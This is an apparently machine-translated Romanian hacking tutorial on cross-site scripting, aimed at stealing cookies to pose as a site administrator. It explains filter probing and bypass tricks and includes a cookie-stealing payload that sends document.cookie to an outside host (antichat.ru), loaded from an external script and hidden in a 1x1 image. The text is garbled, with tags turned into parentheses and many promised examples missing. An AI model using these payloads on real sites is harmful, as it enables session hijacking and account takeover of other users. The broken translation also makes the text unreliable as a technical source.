Xss este Css =) Scripting Cross Site
A nu se confunda cu CSS se mai numeste XSS
Ce este un cookie și pentru ce este XSS?
Un cookie este doar un fișier text de pe computerul clientului și este folosit pentru a stoca informații de către server.
De exemplu, după înregistrarea și conectarea la forum, site-ul stochează informații despre dvs. în cookie. Acolo, de obicei,
utilizatorul și parola acestuia. Deja atunci forumul citește aceste date și vă definește. Un alt exemplu: sunteți administratorul site-ului și eu
simplu utilizator. Dar dacă îmi schimb datele către dvs., voi fi de asemenea definit de sistem ca administrator. De asta
este necesar să fii capabil să furi aceste cookie-uri.
Ce este un atac XSS?
Atacurile XSS nu sunt atacuri pe site-ul în sine, ci pe utilizatorii site-ului.
XSS este un defect în filtru, aplicație.
Există XSS pasiv și XSS activ.
Pasiv - acest Xss, care cere victimei să participe direct + acolo sunt specifice
limitări și complexități. Prin urmare, XSS pasiv nu este foarte apreciat. De exemplu, trebuie să-i dați drumul printr-o legătură otrăvitoare,
Activ - acest XSS, care nu necesită nicio acțiune suplimentară din partea victimei - este suficient
trebuie doar să deschideți pagina cu XSS, iar codul Java va fi executat automat. Datorită automatizării lor, ele sunt foarte utile și valoroase.
De exemplu, xss activă există în etichetele BB din cauza unei filtrare insuficiente, atunci când lăsați un mesaj pe forumgostevechechat,
care va fi întotdeauna activă cu fiecare actualizare.
Cum de a găsi XSS pe acest site?
Încercarea de a insera peste tot pe unde poți, pe alerta () scriptului (script) (/ script). Dacă a fost trimis un mesaj, atunci
apoi scriptul a funcționat și ați găsit XSS.
Luați în considerare un alt XSS ") (script) alert () (/ script). Ce se întâmplă în acest caz: noi
închideți eticheta ") (este posibil ca anumite variabile să precizeze textul pe care îl introducem în formular) și să executăm
Cum se determină dacă filtrul este?
Pentru a face acest lucru, în toate câmpurile, introduceți ";! -" (fuck) =
Apoi, deschideți pagina și căutați cuvântul dracu, precum și alte personaje:
Dacă este lăsat (), atunci acesta este primul semn de vulnerabilitate. Dacă sunt lăsate simboluri, "", atunci acesta este al doilea semn
Dacă nu ați găsit (), atunci cel mai probabil au fost consumate de un filtru. Ei bine, dacă au fost înlocuiți cu alte simboluri, atunci, din păcate,
filtrul funcționează bine.
Dacă filtrul înghite ().
Încercăm să introducem (kdgfjdgfd), uite, dacă este înghițit - apoi introducem scriptul de luptă.
Există, de asemenea, o modalitate de cuprindere a scriptului: (sc (script) ript) alert () (/ sc (/ script) ript). Acest lucru va ajuta cand
filtrul nu este foarte puternic.
Se întâmplă ca filtrul să ia în considerare numărul de etichete deschise și închise și să se închidă, ceea ce va ajuta:
Se întâmplă adesea că filtrul completează scriptul, de exemplu:
Puteți încerca să utilizați codificări diferite și să încercați să codificați scriptul.
Trebuie să încercăm prin încercări și erori.
Trebuie să încercăm să introducem diferite valori, să vedem ce avem de la filtru. Prin metoda de a înțelege cum funcționează filtrul,
care sunt neajunsurile sale. Dacă filtrul este rău, puteți introduce întotdeauna un script.
De exemplu, puteți utiliza numai etichete permise pe site, iar apoi, utilizând acestea, trebuie să executați scriptul. De exemplu, acestea sunt etichete
img, url. Întregul punct este că trebuie să inserăm interogarea noastră în parametrul img sau url. Img are mulți parametri
cu excepția alt și src, care pot fi folosite în cărți de oaspeți și pe forumuri.
Luați în considerare XSS activ
a găsit un XSS activ și în loc de alert (), puteți introduce orice script
Dacă filtrul nu renunță, încercați acest lucru:
Pe pagina asta vei primi următoarea etichetă:
De fapt, alerta () nu face nimic util (era necesar doar pentru verificare). Și aici este scenariul:
El deja fură cookie-urile
Înlocuim astfel:
unde ') (script) img = imagine nouă (); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie; scenariul însuși
2) un script mai sigur, de exemplu:
Există deja o referință la fișierul My.js, care conține
(script) img = imagine nouă (); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;
Deci este mai sigur.
Se întâmplă când trebuie să criptați. Iată un exemplu:
Apoi numim fișierul, de exemplu 1.jpg și îl plasăm pe site. Reacția este:
În acest moment adăugăm linia
în documentul nostru, chemarea la sniffer pentru a trimite un cookie.
Apropo, spre deosebire de metoda frecventă, această imagine nu este afișată
sub forma unei cruci; are un atribut ascuns (stil = display: none) și doar în cazul în care dimensiunile sunt 1x1. După primirea cookie-urilor suntem fără
În plus, dacă treceți prin IE, scenariul va funcționa și dacă în Opera scriptul nu va funcționa și va fi o cruce. Și dacă renumiți la html, opera va funcționa și ea.